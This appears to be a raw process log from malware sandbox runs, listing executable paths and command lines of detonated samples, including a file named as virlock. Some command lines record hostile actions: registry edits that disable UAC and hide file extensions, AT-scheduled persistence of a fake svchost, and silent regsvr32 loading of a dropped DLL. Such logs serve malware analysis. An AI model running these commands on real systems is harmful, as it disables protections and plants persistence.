C:\Windows\System\HDTVkji.exe

C:\Windows\System\HDTVkji.exe

C:\Windows\System\egBCRmf.exe

C:\Windows\System\egBCRmf.exe

\??\c:\48000.exe

c:\48000.exe

C:\Users\Admin\Downloads\240920-vhbtasxaqcee091f677598e979e0e9b8c5c00fb6a2_JaffaCakes118.exe

"C:\Users\Admin\Downloads\240920-vhbtasxaqcee091f677598e979e0e9b8c5c00fb6a2_JaffaCakes118.exe"

\??\c:\6840448.exe

c:\6840448.exe

C:\Windows\System\UrlcZaa.exe

C:\Windows\System\UrlcZaa.exe

C:\Windows\SysWOW64\Dcnqpo32.exe

C:\Windows\system32\Dcnqpo32.exe

C:\Windows\SysWOW64\Cimmggfl.exe

C:\Windows\system32\Cimmggfl.exe

\??\c:\8224882.exe

c:\8224882.exe

C:\program files\internet explorer\IEXPLORE.EXE

"C:\program files\internet explorer\IEXPLORE.EXE"

C:\Windows\System\rCdDevT.exe

C:\Windows\System\rCdDevT.exe

\??\c:\000666.exe

c:\000666.exe

C:\Windows\SysWOW64\Efccmidp.exe

C:\Windows\system32\Efccmidp.exe

C:\Windows\System\ChZCFEG.exe

C:\Windows\System\ChZCFEG.exe

C:\Windows\System\bMynidl.exe

C:\Windows\System\bMynidl.exe

\??\c:\pjjvp.exe

c:\pjjvp.exe

\??\c:\04082.exe

c:\04082.exe

C:\Windows\SysWOW64\Efafgifc.exe

C:\Windows\system32\Efafgifc.exe

C:\Windows\SysWOW64\Epndknin.exe

C:\Windows\system32\Epndknin.exe

\??\c:\htnhbt.exe

c:\htnhbt.exe

C:\Windows\System\qVOtjjH.exe

C:\Windows\System\qVOtjjH.exe

C:\Windows\System\XLwxJCN.exe

C:\Windows\System\XLwxJCN.exe

C:\Windows\System\YhaaNWZ.exe

C:\Windows\System\YhaaNWZ.exe

C:\Windows\System\CcbYcwi.exe

C:\Windows\System\CcbYcwi.exe

\??\c:\vddjp.exe

c:\vddjp.exe

C:\Windows\System\RYqXPmr.exe

C:\Windows\System\RYqXPmr.exe

C:\Windows\System\etLOSBi.exe

C:\Windows\System\etLOSBi.exe

C:\Windows\System\KxEsolm.exe

C:\Windows\System\KxEsolm.exe

C:\Windows\System\gEpDVQv.exe

C:\Windows\System\gEpDVQv.exe

C:\Windows\System\bdleVDA.exe

C:\Windows\System\bdleVDA.exe

C:\Windows\System\bXrQyiy.exe

C:\Windows\System\bXrQyiy.exe

C:\Windows\System\mjGftpe.exe

C:\Windows\System\mjGftpe.exe

C:\Windows\System\FeDNrVN.exe

C:\Windows\System\FeDNrVN.exe

C:\Windows\System\nsohDvA.exe

C:\Windows\System\nsohDvA.exe

C:\Windows\System\TokbbAS.exe

C:\Windows\System\TokbbAS.exe

C:\Windows\System\vMPfXCD.exe

C:\Windows\System\vMPfXCD.exe

C:\Windows\System\WtIjhsY.exe

C:\Windows\System\WtIjhsY.exe

C:\Windows\System\sRVSFkg.exe

C:\Windows\System\sRVSFkg.exe

C:\Windows\System\OYaHzHJ.exe

C:\Windows\System\OYaHzHJ.exe

C:\Windows\System\jAhycSM.exe

C:\Windows\System\jAhycSM.exe

C:\Windows\System\OwprZnk.exe

C:\Windows\System\OwprZnk.exe

C:\Windows\System\qUPORms.exe

C:\Windows\System\qUPORms.exe

C:\Windows\System\fswcapQ.exe

C:\Windows\System\fswcapQ.exe

C:\Windows\System\rMHfVnK.exe

C:\Windows\System\rMHfVnK.exe

C:\Windows\System\WlTrTpi.exe

C:\Windows\System\WlTrTpi.exe

C:\Windows\System\tiyQvkg.exe

C:\Windows\System\tiyQvkg.exe

C:\Windows\System\RMrMQZO.exe

C:\Windows\System\RMrMQZO.exe

C:\Windows\System\kYhpxBe.exe

C:\Windows\System\kYhpxBe.exe

C:\Windows\System\GJtrZJD.exe

C:\Windows\System\GJtrZJD.exe

C:\Windows\System\EmrkVHB.exe

C:\Windows\System\EmrkVHB.exe

C:\Windows\System\LbfoYJh.exe

C:\Windows\System\LbfoYJh.exe

C:\Windows\System\iaziucB.exe

C:\Windows\System\iaziucB.exe

C:\Windows\System\SNrvuOa.exe

C:\Windows\System\SNrvuOa.exe

C:\Windows\System\hJJqqrw.exe

C:\Windows\System\hJJqqrw.exe

C:\Windows\System\hyjfSbu.exe

C:\Windows\System\hyjfSbu.exe

C:\Windows\System\abtcbBU.exe

C:\Windows\System\abtcbBU.exe

C:\Windows\System\hjZGOXm.exe

C:\Windows\System\hjZGOXm.exe

C:\Windows\System\PDBkSZd.exe

C:\Windows\System\PDBkSZd.exe

C:\Windows\System\OJEEObj.exe

C:\Windows\System\OJEEObj.exe

C:\Windows\System\GOoDZEB.exe

C:\Windows\System\GOoDZEB.exe

C:\Windows\System\WKAqPgT.exe

C:\Windows\System\WKAqPgT.exe

C:\Windows\System\KirSlMO.exe

C:\Windows\System\KirSlMO.exe

C:\Windows\System\wspVWCH.exe

C:\Windows\System\wspVWCH.exe

C:\Windows\System\ExwPWBH.exe

C:\Windows\System\ExwPWBH.exe

C:\Windows\System\DxaNOPz.exe

C:\Windows\System\DxaNOPz.exe

C:\Windows\System\QOtknbO.exe

C:\Windows\System\QOtknbO.exe

C:\Windows\System\pcMFHGb.exe

C:\Windows\System\pcMFHGb.exe

C:\Windows\System\lweTDPU.exe

C:\Windows\System\lweTDPU.exe

C:\Windows\System\GGXsiCu.exe

C:\Windows\System\GGXsiCu.exe

C:\Windows\System\eIJxkec.exe

C:\Windows\System\eIJxkec.exe

C:\Windows\System\EaluxbB.exe

C:\Windows\System\EaluxbB.exe

C:\Windows\System\dHUFRUw.exe

C:\Windows\System\dHUFRUw.exe

\??\c:\bhnhhh.exe

c:\bhnhhh.exe

\??\c:\1hbnnn.exe

c:\1hbnnn.exe

\??\c:\002260.exe

c:\002260.exe

C:\Windows\SysWOW64\Hlegnjbm.exe

C:\Windows\system32\Hlegnjbm.exe

\??\c:\lllllff.exe

c:\lllllff.exe

C:\Windows\System\yDOLllh.exe

C:\Windows\System\yDOLllh.exe

C:\Windows\System\GXwWmYn.exe

C:\Windows\System\GXwWmYn.exe

C:\Windows\System\dOkmAdL.exe

C:\Windows\System\dOkmAdL.exe

C:\Windows\System\CsejwfS.exe

C:\Windows\System\CsejwfS.exe

C:\Windows\System\svXFIkN.exe

C:\Windows\System\svXFIkN.exe

C:\Windows\System\FrUUcvA.exe

C:\Windows\System\FrUUcvA.exe

C:\Windows\System\BxEQbIE.exe

C:\Windows\System\BxEQbIE.exe

C:\Windows\System\XGXEMQt.exe

C:\Windows\System\XGXEMQt.exe

C:\Windows\System\ztXoBVb.exe

C:\Windows\System\ztXoBVb.exe

C:\Windows\System\nHSnDZr.exe

C:\Windows\System\nHSnDZr.exe

C:\Windows\System\FTnxisi.exe

C:\Windows\System\FTnxisi.exe

C:\Windows\System\eluIHIh.exe

C:\Windows\System\eluIHIh.exe

C:\Windows\System\OLtbivm.exe

C:\Windows\System\OLtbivm.exe

C:\Windows\System\NdXjKhG.exe

C:\Windows\System\NdXjKhG.exe

C:\Windows\System\lUgzzAf.exe

C:\Windows\System\lUgzzAf.exe

C:\Windows\System\HucAkSQ.exe

C:\Windows\System\HucAkSQ.exe

C:\Windows\System\qNewuRt.exe

C:\Windows\System\qNewuRt.exe

C:\Windows\System\iHqereA.exe

C:\Windows\System\iHqereA.exe

C:\Windows\System\TICwSTf.exe

C:\Windows\System\TICwSTf.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /C AT /delete /yes

C:\Windows\System\LCixUCH.exe

C:\Windows\System\LCixUCH.exe

C:\Windows\System\jVGkyRu.exe

C:\Windows\System\jVGkyRu.exe

C:\Windows\System\BOsUZUA.exe

C:\Windows\System\BOsUZUA.exe

C:\Windows\System\YfrHTHZ.exe

C:\Windows\System\YfrHTHZ.exe

C:\Windows\System\HkTGSmd.exe

C:\Windows\System\HkTGSmd.exe

C:\Windows\System\NpvghEs.exe

C:\Windows\System\NpvghEs.exe

C:\Windows\System\DNkYFfe.exe

C:\Windows\System\DNkYFfe.exe

C:\Windows\System\TBtUVcy.exe

C:\Windows\System\TBtUVcy.exe

C:\Windows\System\YcDjYtY.exe

C:\Windows\System\YcDjYtY.exe

C:\Windows\System\tckwnmC.exe

C:\Windows\System\tckwnmC.exe

C:\Windows\System\tcznDiO.exe

C:\Windows\System\tcznDiO.exe

C:\Windows\System\gxERzrC.exe

C:\Windows\System\gxERzrC.exe

C:\Windows\System\pYqcgNZ.exe

C:\Windows\System\pYqcgNZ.exe

C:\Windows\System\RFqDDqb.exe

C:\Windows\System\RFqDDqb.exe

C:\Windows\System\GPycsDd.exe

C:\Windows\System\GPycsDd.exe

C:\Windows\System\ErwSHhy.exe

C:\Windows\System\ErwSHhy.exe

C:\Windows\System\TTDWbKy.exe

C:\Windows\System\TTDWbKy.exe

C:\Windows\System\ZaniEHb.exe

C:\Windows\System\ZaniEHb.exe

C:\Windows\System\ReKrtFb.exe

C:\Windows\System\ReKrtFb.exe

C:\Windows\System\dacCsxO.exe

C:\Windows\System\dacCsxO.exe

C:\Windows\System\guYrNBa.exe

C:\Windows\System\guYrNBa.exe

C:\Windows\System\FwnTKBx.exe

C:\Windows\System\FwnTKBx.exe

C:\Windows\System\bEOSUzk.exe

C:\Windows\System\bEOSUzk.exe

C:\Windows\System\ATBpTEw.exe

C:\Windows\System\ATBpTEw.exe

C:\Windows\System\wnuXiqM.exe

C:\Windows\System\wnuXiqM.exe

C:\Windows\System\FsAiDge.exe

C:\Windows\System\FsAiDge.exe

C:\Windows\System\FDwYBCP.exe

C:\Windows\System\FDwYBCP.exe

C:\Windows\System\jjOxFEc.exe

C:\Windows\System\jjOxFEc.exe

C:\Windows\System\ZYiBuem.exe

C:\Windows\System\ZYiBuem.exe

C:\Windows\System\zyLwQDq.exe

C:\Windows\System\zyLwQDq.exe

C:\Windows\System\sgsIdeb.exe

C:\Windows\System\sgsIdeb.exe

C:\Windows\System\MzJtdfE.exe

C:\Windows\System\MzJtdfE.exe

C:\Windows\System\DFqIxHK.exe

C:\Windows\System\DFqIxHK.exe

C:\Windows\System\ZtXfqMx.exe

C:\Windows\System\ZtXfqMx.exe

\??\c:\fflffxl.exe

c:\fflffxl.exe

C:\Windows\System\sCePYIE.exe

C:\Windows\System\sCePYIE.exe

C:\Windows\System\brIkdni.exe

C:\Windows\System\brIkdni.exe

\??\c:\1xrrfxx.exe

c:\1xrrfxx.exe

\??\c:\4248862.exe

c:\4248862.exe

\??\c:\o442866.exe

c:\o442866.exe

C:\Windows\System\DtQVZSa.exe

C:\Windows\System\DtQVZSa.exe

C:\Windows\SysWOW64\Lqpamb32.exe

C:\Windows\system32\Lqpamb32.exe

C:\Windows\SysWOW64\Lmdemd32.exe

C:\Windows\system32\Lmdemd32.exe

C:\Windows\System\ekezwdK.exe

C:\Windows\System\ekezwdK.exe

C:\Windows\System\mtJjoGd.exe

C:\Windows\System\mtJjoGd.exe

C:\Windows\System\InxgizH.exe

C:\Windows\System\InxgizH.exe

C:\Windows\System\eajymzn.exe

C:\Windows\System\eajymzn.exe

C:\Windows\System\EGybAoL.exe

C:\Windows\System\EGybAoL.exe

C:\Windows\System\kBQNvfL.exe

C:\Windows\System\kBQNvfL.exe

C:\Windows\System\wpHmJqc.exe

C:\Windows\System\wpHmJqc.exe

C:\Windows\System\xnUBDsN.exe

C:\Windows\System\xnUBDsN.exe

C:\Windows\System\OMUHMbp.exe

C:\Windows\System\OMUHMbp.exe

C:\Windows\System\MyzFBLs.exe

C:\Windows\System\MyzFBLs.exe

C:\Windows\System\YDmtvOv.exe

C:\Windows\System\YDmtvOv.exe

C:\Windows\System\EHifrCN.exe

C:\Windows\System\EHifrCN.exe

C:\Windows\System\FAQeEIp.exe

C:\Windows\System\FAQeEIp.exe

C:\Windows\System\XqGpeuZ.exe

C:\Windows\System\XqGpeuZ.exe

C:\Windows\System\JxYWIFy.exe

C:\Windows\System\JxYWIFy.exe

C:\Windows\System\hxeSGtJ.exe

C:\Windows\System\hxeSGtJ.exe

C:\Windows\System\PJNaRRq.exe

C:\Windows\System\PJNaRRq.exe

C:\Windows\System\QnElfRT.exe

C:\Windows\System\QnElfRT.exe

C:\Windows\System\ZolJdKO.exe

C:\Windows\System\ZolJdKO.exe

C:\Windows\System\LpKKfBT.exe

C:\Windows\System\LpKKfBT.exe

C:\Windows\System\kJVUviN.exe

C:\Windows\System\kJVUviN.exe

C:\Windows\System\OScBilL.exe

C:\Windows\System\OScBilL.exe

C:\Windows\System\qfuZYwc.exe

C:\Windows\System\qfuZYwc.exe

C:\Windows\System\gzAbfFq.exe

C:\Windows\System\gzAbfFq.exe

C:\Windows\System\xHqnjHs.exe

C:\Windows\System\xHqnjHs.exe

C:\Windows\System\ChWETlj.exe

C:\Windows\System\ChWETlj.exe

C:\Windows\System\vFWADbR.exe

C:\Windows\System\vFWADbR.exe

C:\Windows\System\qstLNWF.exe

C:\Windows\System\qstLNWF.exe

C:\Windows\System\koyQkTO.exe

C:\Windows\System\koyQkTO.exe

C:\Windows\System\LKRWQyN.exe

C:\Windows\System\LKRWQyN.exe

C:\Windows\System\UaUPhlS.exe

C:\Windows\System\UaUPhlS.exe

C:\Windows\System\GkcdSNQ.exe

C:\Windows\System\GkcdSNQ.exe

C:\Windows\System\lJepSCA.exe

C:\Windows\System\lJepSCA.exe

C:\Windows\System\kSLbxLI.exe

C:\Windows\System\kSLbxLI.exe

C:\Windows\System\BfGCbrC.exe

C:\Windows\System\BfGCbrC.exe

C:\Windows\System\odfKAcT.exe

C:\Windows\System\odfKAcT.exe

C:\Windows\System\nNyvVOE.exe

C:\Windows\System\nNyvVOE.exe

C:\Windows\System\TohpbEY.exe

C:\Windows\System\TohpbEY.exe

C:\Windows\System\PyFWyNH.exe

C:\Windows\System\PyFWyNH.exe

C:\Windows\System\EiSlWsS.exe

C:\Windows\System\EiSlWsS.exe

\??\c:\22828.exe

c:\22828.exe

C:\Windows\System\ffcmlYw.exe

C:\Windows\System\ffcmlYw.exe

C:\Windows\System\JkfSqBT.exe

C:\Windows\System\JkfSqBT.exe

C:\Windows\SysWOW64\Oanfen32.exe

C:\Windows\system32\Oanfen32.exe

C:\Windows\System\HCwQcTC.exe

C:\Windows\System\HCwQcTC.exe

C:\Windows\System\KQqlrRL.exe

C:\Windows\System\KQqlrRL.exe

C:\Windows\System\fJEXdBR.exe

C:\Windows\System\fJEXdBR.exe

C:\Windows\System\sNSSsFZ.exe

C:\Windows\System\sNSSsFZ.exe

C:\Windows\System\TOtFAOd.exe

C:\Windows\System\TOtFAOd.exe

C:\Windows\System\hNqIUWX.exe

C:\Windows\System\hNqIUWX.exe

C:\Windows\System\hiqaQKG.exe

C:\Windows\System\hiqaQKG.exe

C:\Windows\System\HnWTrFw.exe

C:\Windows\System\HnWTrFw.exe

C:\Windows\System\ZfhAdLN.exe

C:\Windows\System\ZfhAdLN.exe

C:\Windows\System\jjNKypz.exe

C:\Windows\System\jjNKypz.exe

C:\Windows\System\ALnBRRs.exe

C:\Windows\System\ALnBRRs.exe

C:\Windows\System\QPFPogO.exe

C:\Windows\System\QPFPogO.exe

C:\Windows\System\VhOJvfi.exe

C:\Windows\System\VhOJvfi.exe

C:\Windows\System\jWwbvpI.exe

C:\Windows\System\jWwbvpI.exe

C:\Windows\System\HokVuml.exe

C:\Windows\System\HokVuml.exe

C:\Windows\System\xLeEqXX.exe

C:\Windows\System\xLeEqXX.exe

C:\Windows\System\qlWMIzg.exe

C:\Windows\System\qlWMIzg.exe

C:\Windows\System\hQooLrE.exe

C:\Windows\System\hQooLrE.exe

C:\Windows\System\zrqbAWk.exe

C:\Windows\System\zrqbAWk.exe

C:\Windows\System\pWpLdtA.exe

C:\Windows\System\pWpLdtA.exe

C:\Windows\System\QYoeezz.exe

C:\Windows\System\QYoeezz.exe

C:\Windows\System\bEyVViK.exe

C:\Windows\System\bEyVViK.exe

C:\Windows\System\ZJUuGfb.exe

C:\Windows\System\ZJUuGfb.exe

C:\Windows\System\jSimeDl.exe

C:\Windows\System\jSimeDl.exe

C:\Windows\System\pDQABeM.exe

C:\Windows\System\pDQABeM.exe

C:\Windows\System\ucExuYd.exe

C:\Windows\System\ucExuYd.exe

C:\Windows\System\nQxxLBE.exe

C:\Windows\System\nQxxLBE.exe

C:\Windows\System\wattPfD.exe

C:\Windows\System\wattPfD.exe

\??\c:\680666.exe

c:\680666.exe

C:\Windows\System\oZkwnlb.exe

C:\Windows\System\oZkwnlb.exe

\??\c:\844426.exe

c:\844426.exe

\??\c:\00004.exe

c:\00004.exe

\??\c:\2004842.exe

c:\2004842.exe

\??\c:\dvvpp.exe

c:\dvvpp.exe

\??\c:\rlrlrrx.exe

c:\rlrlrrx.exe

C:\Windows\SysWOW64\Qkipkani.exe

C:\Windows\system32\Qkipkani.exe

C:\Windows\SysWOW64\Pocpfphe.exe

C:\Windows\system32\Pocpfphe.exe

C:\Users\Admin\Downloads\240920-t7m27axajr2024-09-20_006fbb7a7a5386fe5629f895d8969b45_virlock.exe

C:\Users\Admin\Downloads\240920-t7m27axajr2024-09-20_006fbb7a7a5386fe5629f895d8969b45_virlock

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\Syslemtchpy.exe

"C:\Users\Admin\AppData\Local\Temp\Syslemtchpy.exe"

C:\Windows\SysWOW64\themecpl\OposHost.exe

"C:\Windows\SysWOW64\themecpl\OposHost.exe"

C:\Windows\System\rNPSFwW.exe

C:\Windows\System\rNPSFwW.exe

C:\Windows\System\FEeFytR.exe

C:\Windows\System\FEeFytR.exe

C:\Windows\D3_08.exe

C:\Windows\D3_08.exe

C:\Users\Admin\AppData\Local\kayitgir.exe

"C:\Users\Admin\AppData\Local\kayitgir.exe"

C:\Windows\System\XUCEygc.exe

C:\Windows\System\XUCEygc.exe

\??\c:\4806004.exe

c:\4806004.exe

C:\Windows\System\MywtnGu.exe

C:\Windows\System\MywtnGu.exe

\??\c:\hnnntb.exe

c:\hnnntb.exe

\??\c:\g0482.exe

c:\g0482.exe

C:\Windows\System\BscqTSb.exe

C:\Windows\System\BscqTSb.exe

\??\c:\vdpdp.exe

c:\vdpdp.exe

C:\Windows\SysWOW64\Gbalopbn.exe

C:\Windows\system32\Gbalopbn.exe

\??\c:\66660.exe

c:\66660.exe

C:\Windows\System\pvPopsH.exe

C:\Windows\System\pvPopsH.exe

C:\Windows\System\RWTjWey.exe

C:\Windows\System\RWTjWey.exe

C:\Windows\System\JMixRFI.exe

C:\Windows\System\JMixRFI.exe

C:\Windows\System\UAcOdPO.exe

C:\Windows\System\UAcOdPO.exe

\??\c:\xxfxllf.exe

c:\xxfxllf.exe

C:\Windows\System\QgVEJZL.exe

C:\Windows\System\QgVEJZL.exe

C:\Windows\SysWOW64\Gflhoo32.exe

C:\Windows\system32\Gflhoo32.exe

C:\Windows\System\UWptETK.exe

C:\Windows\System\UWptETK.exe

C:\Windows\System\PSVgqnF.exe

C:\Windows\System\PSVgqnF.exe

C:\Windows\System\yMdYCzV.exe

C:\Windows\System\yMdYCzV.exe

C:\Windows\System\qJLOPbQ.exe

C:\Windows\System\qJLOPbQ.exe

C:\Windows\SysWOW64\cinmon.exe

"C:\Windows\system32\cinmon.exe"

\??\c:\86826.exe

c:\86826.exe

C:\Windows\System\tDLTGkT.exe

C:\Windows\System\tDLTGkT.exe

C:\Windows\System\epBhAHY.exe

C:\Windows\System\epBhAHY.exe

C:\Windows\SysWOW64\Hoaojp32.exe

C:\Windows\system32\Hoaojp32.exe

C:\Windows\System\OgcMEYN.exe

C:\Windows\System\OgcMEYN.exe

C:\Windows\System\klurwIB.exe

C:\Windows\System\klurwIB.exe

C:\Windows\System\AFdEQwD.exe

C:\Windows\System\AFdEQwD.exe

C:\Windows\System\KuYzwxj.exe

C:\Windows\System\KuYzwxj.exe

C:\Windows\System\UXPcZCs.exe

C:\Windows\System\UXPcZCs.exe

\??\c:\244242.exe

c:\244242.exe

C:\Windows\System\ctYJsoh.exe

C:\Windows\System\ctYJsoh.exe

C:\Windows\System\aktqLZb.exe

C:\Windows\System\aktqLZb.exe

C:\Windows\System\oajaNft.exe

C:\Windows\System\oajaNft.exe

C:\Windows\System\xOQWZKF.exe

C:\Windows\System\xOQWZKF.exe

C:\Windows\System\OqtuShR.exe

C:\Windows\System\OqtuShR.exe

\??\c:\nhnbbh.exe

c:\nhnbbh.exe

C:\Windows\System\PvSFCsF.exe

C:\Windows\System\PvSFCsF.exe

C:\Windows\System\czHQumt.exe

C:\Windows\System\czHQumt.exe

C:\Windows\System\ojzZkrK.exe

C:\Windows\System\ojzZkrK.exe

C:\Windows\System\dtOPWQV.exe

C:\Windows\System\dtOPWQV.exe

C:\Windows\System\oDsPEQp.exe

C:\Windows\System\oDsPEQp.exe

C:\Windows\System\vcZHAar.exe

C:\Windows\System\vcZHAar.exe

C:\Windows\System\IuoSTzd.exe

C:\Windows\System\IuoSTzd.exe

C:\Windows\SysWOW64\Iliinc32.exe

C:\Windows\system32\Iliinc32.exe

C:\Windows\System\klHnKvl.exe

C:\Windows\System\klHnKvl.exe

C:\Windows\System\nNBBWdn.exe

C:\Windows\System\nNBBWdn.exe

C:\Windows\System\ahNcoGc.exe

C:\Windows\System\ahNcoGc.exe

C:\Windows\System\QHLeRSa.exe

C:\Windows\System\QHLeRSa.exe

C:\Windows\System\McCNHWE.exe

C:\Windows\System\McCNHWE.exe

C:\Windows\System\XILWwER.exe

C:\Windows\System\XILWwER.exe

C:\Windows\System\CcMvnko.exe

C:\Windows\System\CcMvnko.exe

C:\Windows\System\MYcQqRR.exe

C:\Windows\System\MYcQqRR.exe

C:\Windows\SysWOW64\nistyp.exe

"C:\Windows\SysWOW64\nistyp.exe"

C:\Windows\System\kdvzklo.exe

C:\Windows\System\kdvzklo.exe

C:\Windows\System\xCYbGib.exe

C:\Windows\System\xCYbGib.exe

C:\Windows\temp\20115313521.exe

"C:\Windows\temp\20115313521.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\240920-t7m27axajr2024-09-20_006fbb7a7a5386fe5629f895d8969b45_virlock"

C:\Windows\System\ZqXbvHl.exe

C:\Windows\System\ZqXbvHl.exe

C:\Windows\System\ZVsXPpN.exe

C:\Windows\System\ZVsXPpN.exe

C:\Windows\System\WYCJOHn.exe

C:\Windows\System\WYCJOHn.exe

C:\Windows\System\cqzcTfj.exe

C:\Windows\System\cqzcTfj.exe

C:\Windows\System\lXYLrtm.exe

C:\Windows\System\lXYLrtm.exe

C:\Windows\System\OisEAog.exe

C:\Windows\System\OisEAog.exe

\??\c:\2488404.exe

c:\2488404.exe

\??\c:\68488.exe

c:\68488.exe

\??\c:\tnnnhh.exe

c:\tnnnhh.exe

C:\Windows\SysWOW64\Jiglnf32.exe

C:\Windows\system32\Jiglnf32.exe

\??\c:\vpvvv.exe

c:\vpvvv.exe

C:\Windows\System\kOjului.exe

C:\Windows\System\kOjului.exe

\??\c:\060828.exe

c:\060828.exe

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\System\smjNSLR.exe

C:\Windows\System\smjNSLR.exe

C:\Windows\System\EURlpXZ.exe

C:\Windows\System\EURlpXZ.exe

C:\Windows\apppatch\svchost.exe

"C:\Windows\apppatch\svchost.exe"

C:\Windows\System\oNNDBhL.exe

C:\Windows\System\oNNDBhL.exe

C:\Windows\System\FSlilAy.exe

C:\Windows\System\FSlilAy.exe

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\System\jhZIqQO.exe

C:\Windows\System\jhZIqQO.exe

C:\Windows\System\fTpdlyI.exe

C:\Windows\System\fTpdlyI.exe

C:\Windows\SysWOW64\nistyp.exe

--d5964105

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\System\MzBQLuN.exe

C:\Windows\System\MzBQLuN.exe

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\test.pdf"

C:\Windows\System\AvFyyFX.exe

C:\Windows\System\AvFyyFX.exe

C:\Windows\System\rkZwsbX.exe

C:\Windows\System\rkZwsbX.exe

C:\Windows\System\AUyMqOH.exe

C:\Windows\System\AUyMqOH.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4316 -s 584

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MYsgYwMs.bat" "C:\Users\Admin\Downloads\240920-t7m27axajr2024-09-20_006fbb7a7a5386fe5629f895d8969b45_virlock.exe""

C:\Windows\System\NuWgrru.exe

C:\Windows\System\NuWgrru.exe

C:\Windows\System\kQWdeFH.exe

C:\Windows\System\kQWdeFH.exe

C:\Windows\SysWOW64\Nmkmjjaa.exe

C:\Windows\system32\Nmkmjjaa.exe

\??\c:\a0626.exe

c:\a0626.exe

C:\Windows\SysWOW64\at.exe

AT /delete /yes

C:\Windows\System\wnbBqUP.exe

C:\Windows\System\wnbBqUP.exe

C:\Windows\System\xDobWTJ.exe

C:\Windows\System\xDobWTJ.exe

C:\Windows\System\JcfwCLP.exe

C:\Windows\System\JcfwCLP.exe

C:\Windows\System\FzXgnVN.exe

C:\Windows\System\FzXgnVN.exe

C:\Users\Admin\Downloads\240920-vhbtasxaqcee091f677598e979e0e9b8c5c00fb6a2_JaffaCakes118.exe

"C:\Users\Admin\Downloads\240920-vhbtasxaqcee091f677598e979e0e9b8c5c00fb6a2_JaffaCakes118.exe"

C:\Windows\SysWOW64\Pfdjinjo.exe

C:\Windows\system32\Pfdjinjo.exe

C:\Windows\System\IXorjRw.exe

C:\Windows\System\IXorjRw.exe

\??\c:\frxxxxx.exe

c:\frxxxxx.exe

\??\c:\btbhhn.exe

c:\btbhhn.exe

C:\Windows\System\czBvwRo.exe

C:\Windows\System\czBvwRo.exe

C:\Windows\System\yDkGmXo.exe

C:\Windows\System\yDkGmXo.exe

\??\c:\frrfxrl.exe

c:\frrfxrl.exe

\??\c:\2628222.exe

c:\2628222.exe

\??\c:\4628220.exe

c:\4628220.exe

C:\Windows\System\VbsbPTq.exe

C:\Windows\System\VbsbPTq.exe

C:\Windows\System\cXqEXXS.exe

C:\Windows\System\cXqEXXS.exe

C:\Windows\System\RxgXJHe.exe

C:\Windows\System\RxgXJHe.exe

C:\Windows\System\eqoMnVp.exe

C:\Windows\System\eqoMnVp.exe

C:\Windows\System\SFXHBrW.exe

C:\Windows\System\SFXHBrW.exe

C:\Windows\System\XOaOxwA.exe

C:\Windows\System\XOaOxwA.exe

C:\Windows\System\talWTKp.exe

C:\Windows\System\talWTKp.exe

C:\Windows\System\JzJmggH.exe

C:\Windows\System\JzJmggH.exe

C:\Windows\System\DIZkWRq.exe

C:\Windows\System\DIZkWRq.exe

C:\Windows\System\gIaWgyH.exe

C:\Windows\System\gIaWgyH.exe

C:\Windows\System\oJtlCFW.exe

C:\Windows\System\oJtlCFW.exe

C:\Windows\System\fewkiHU.exe

C:\Windows\System\fewkiHU.exe

C:\Windows\SysWOW64\Adfgdpmi.exe

C:\Windows\system32\Adfgdpmi.exe

\??\c:\2840000.exe

c:\2840000.exe

C:\Windows\System\kPWsDoq.exe

C:\Windows\System\kPWsDoq.exe

C:\Windows\System\CGFaQgr.exe

C:\Windows\System\CGFaQgr.exe

C:\Windows\System\QKOaWWw.exe

C:\Windows\System\QKOaWWw.exe

C:\Windows\System\AEOVRXR.exe

C:\Windows\System\AEOVRXR.exe

C:\Windows\SysWOW64\Adhdjpjf.exe

C:\Windows\system32\Adhdjpjf.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /C AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su C:\Windows\system32\svchost .exe

C:\Windows\System\lJXLKXN.exe

C:\Windows\System\lJXLKXN.exe

C:\Windows\System\ozLDUmR.exe

C:\Windows\System\ozLDUmR.exe

\??\c:\pvddj.exe

c:\pvddj.exe

\??\c:\42226.exe

c:\42226.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Users\Admin\Downloads\240920-vddgbswhmhGLOBAL ORIOLE.pdf.exe"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" /s /c C:\Windows\system32\Nessery.dll

\??\c:\fflfffx.exe

c:\fflfffx.exe

C:\Windows\System\gASHCZV.exe

C:\Windows\System\gASHCZV.exe

C:\Windows\System\LUcHQXb.exe

C:\Windows\System\LUcHQXb.exe

\??\c:\5jpjj.exe

c:\5jpjj.exe

\??\c:\e44426.exe

c:\e44426.exe

C:\Windows\System\KUjvFYy.exe

C:\Windows\System\KUjvFYy.exe

C:\Windows\System\UKgfvMY.exe

C:\Windows\System\UKgfvMY.exe

C:\Windows\System\SkVNDNx.exe

C:\Windows\System\SkVNDNx.exe

C:\Windows\System\tsGJKgf.exe

C:\Windows\System\tsGJKgf.exe

C:\Windows\SysWOW64\Nessery.exe

"C:\Windows\system32\Nessery.exe"

C:\Windows\System\mozbScl.exe

C:\Windows\System\mozbScl.exe

C:\Windows\System\fKPwTLv.exe

C:\Windows\System\fKPwTLv.exe

C:\Windows\System\PZFVkRI.exe

C:\Windows\System\PZFVkRI.exe

